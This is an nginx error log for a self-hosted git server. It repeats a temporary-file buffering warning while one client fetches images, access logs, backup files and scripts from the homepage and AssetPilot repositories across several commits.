2026/02/15 13:23:38 [warn] 832#832: *20001 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/66/0000004666 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr"
2026/02/15 13:23:39 [warn] 832#832: *20001 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/66/0000004667 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr"
2026/02/15 13:24:57 [warn] 834#834: *20319 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/66/0000004668 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/branch/main/npm/data/logs/proxy-host-4_access.log HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/branch/main/npm/data/logs/proxy-host-4_access.log", host: "git.hanmocnn.co.kr"
2026/02/15 13:24:57 [warn] 834#834: *20319 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/66/0000004669 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/branch/main/npm/data/logs/proxy-host-3_access.log HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/branch/main/npm/data/logs/proxy-host-3_access.log", host: "git.hanmocnn.co.kr"
2026/02/15 13:25:58 [warn] 833#833: *20525 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/67/0000004670 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr"
2026/02/15 13:26:46 [warn] 834#834: *20664 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/67/0000004671 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/branch/main/.Backup/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/branch/main/.Backup/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr"
2026/02/15 13:26:47 [warn] 834#834: *20664 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/67/0000004672 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/branch/main/.Backup/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/branch/main/.Backup/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr"
2026/02/15 13:26:51 [warn] 834#834: *20734 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/67/0000004673 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png", host: "git.hanmocnn.co.kr"
2026/02/15 13:26:57 [warn] 834#834: *20734 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/67/0000004674 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr"
2026/02/15 13:26:57 [warn] 834#834: *20734 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/67/0000004675 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr"
2026/02/15 14:20:46 [warn] 831#831: *21229 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/67/0000004676 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr"
2026/02/15 14:22:14 [warn] 827#827: *21306 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/67/0000004677 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-4_access.log HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-4_access.log", host: "git.hanmocnn.co.kr"
2026/02/15 14:22:14 [warn] 827#827: *21306 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/67/0000004678 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-3_access.log HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-3_access.log", host: "git.hanmocnn.co.kr"
2026/02/15 14:23:21 [warn] 828#828: *21434 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/67/0000004679 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr"
2026/02/15 14:23:22 [warn] 828#828: *21434 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/68/0000004680 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-2_access.log HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-2_access.log", host: "git.hanmocnn.co.kr"
2026/02/15 14:23:22 [warn] 828#828: *21434 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/68/0000004681 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr"
2026/02/15 14:23:23 [warn] 828#828: *21434 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/68/0000004682 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr"
2026/02/15 14:24:25 [warn] 829#829: *21519 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/68/0000004683 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png?auto=format&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png?auto=format&q=80&w=1000", host: "git.hanmocnn.co.kr"
2026/02/15 14:24:25 [warn] 829#829: *21519 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/68/0000004684 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "git.hanmocnn.co.kr"
2026/02/15 14:24:25 [warn] 829#829: *21519 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/68/0000004685 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "git.hanmocnn.co.kr"
2026/02/15 14:24:25 [warn] 829#829: *21519 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/68/0000004686 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png?auto=format&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png?auto=format&q=80&w=800", host: "git.hanmocnn.co.kr"
2026/02/15 14:24:26 [warn] 829#829: *21519 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/68/0000004687 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr"
2026/02/15 14:24:26 [warn] 829#829: *21519 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/68/0000004688 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?style=split&whitespace=ignore-change HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?style=split&whitespace=ignore-change", host: "git.hanmocnn.co.kr"
2026/02/15 14:24:26 [warn] 829#829: *21519 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/68/0000004689 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?style=split&whitespace=ignore-all HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?style=split&whitespace=ignore-all", host: "git.hanmocnn.co.kr"
2026/02/15 14:26:26 [warn] 830#830: *21785 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/69/0000004690 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr"
2026/02/15 14:26:26 [warn] 830#830: *21785 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/69/0000004691 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/update_status.py HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/update_status.py", host: "git.hanmocnn.co.kr"
2026/02/15 14:26:45 [warn] 830#830: *21819 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/69/0000004692 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr"
2026/02/15 14:26:45 [warn] 830#830: *21819 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/69/0000004693 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr"
2026/02/15 14:26:46 [warn] 830#830: *21819 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/69/0000004694 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate.csh?display=source HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate.csh?display=source", host: "git.hanmocnn.co.kr"
2026/02/15 14:26:46 [warn] 830#830: *21819 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/69/0000004695 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate.fish?display=source HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate.fish?display=source", host: "git.hanmocnn.co.kr"
2026/02/15 14:26:46 [warn] 830#830: *21819 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/69/0000004696 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr"
2026/02/15 14:26:46 [warn] 830#830: *21819 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/69/0000004697 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?files=npm%2Fdata%2Flogs%2Fproxy-host-1_access.log HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?files=npm%2Fdata%2Flogs%2Fproxy-host-1_access.log", host: "git.hanmocnn.co.kr"
2026/02/15 14:26:47 [warn] 830#830: *21819 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/69/0000004698 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr"
2026/02/15 14:27:02 [warn] 833#833: *21853 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/69/0000004699 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr"
2026/02/15 14:27:02 [warn] 833#833: *21853 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/70/0000004700 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr"
2026/02/15 14:27:03 [warn] 833#833: *21853 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/70/0000004701 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr"
2026/02/15 14:27:10 [warn] 833#833: *21889 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/70/0000004702 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr"
2026/02/15 14:27:10 [warn] 833#833: *21889 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/70/0000004703 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr"
2026/02/15 14:27:11 [warn] 833#833: *21889 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/70/0000004704 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr"
2026/02/15 14:27:12 [warn] 833#833: *21889 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/70/0000004705 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr"
2026/02/15 14:27:12 [warn] 833#833: *21889 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/70/0000004706 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?style=split&whitespace=ignore-change HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?style=split&whitespace=ignore-change", host: "git.hanmocnn.co.kr"
2026/02/15 14:28:06 [warn] 834#834: *21958 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/70/0000004707 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-1_access.log HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-1_access.log", host: "git.hanmocnn.co.kr"
2026/02/15 14:28:13 [warn] 834#834: *21993 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/70/0000004708 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr"
2026/02/15 14:28:14 [warn] 834#834: *21993 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/70/0000004709 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/favicon.ico HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/favicon.ico", host: "git.hanmocnn.co.kr"
2026/02/15 14:28:14 [warn] 834#834: *21993 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/71/0000004710 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr"
2026/02/15 14:28:15 [warn] 834#834: *21993 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/71/0000004711 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png", host: "git.hanmocnn.co.kr"
2026/02/15 14:28:25 [warn] 834#834: *22026 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/71/0000004712 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr"
2026/02/15 14:28:25 [warn] 834#834: *22026 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/71/0000004713 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr"
2026/02/15 14:28:26 [warn] 834#834: *22026 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/71/0000004714 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr"
2026/02/15 14:30:24 [warn] 832#832: *22185 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/71/0000004715 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr"
2026/02/15 14:30:24 [warn] 829#829: *22182 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/71/0000004716 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr"
2026/02/15 14:30:25 [warn] 829#829: *22182 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/71/0000004717 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr"
2026/02/15 14:30:50 [warn] 827#827: *22209 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/71/0000004718 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr"
2026/02/15 14:30:50 [warn] 827#827: *22209 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/71/0000004719 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr"
2026/02/15 14:32:06 [warn] 829#829: *22307 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/72/0000004720 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr"
